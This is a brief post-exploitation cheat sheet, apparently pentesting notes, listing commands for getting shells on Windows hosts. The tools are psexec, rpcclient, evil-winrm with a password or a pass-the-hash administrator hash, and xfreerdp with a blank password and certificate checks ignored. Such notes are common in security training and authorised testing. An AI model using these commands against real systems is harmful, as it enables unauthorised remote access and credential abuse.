Post Exploit

Shell Access

# Get shell via psexec (Impacket)
psexec.py user@TARGET_IP

rpcclient

evil-winrm -i $IP -u user

# Auth with admin hash (get via secretdump by example)
sudo evil-winrm -u "Administrator" -H <administator_hash> -i $IP

# RDP
xfreerdp /u:administrator /p:'' /v:$IP # adminsitrator with blank pass

/cert:ignore # ignore certificat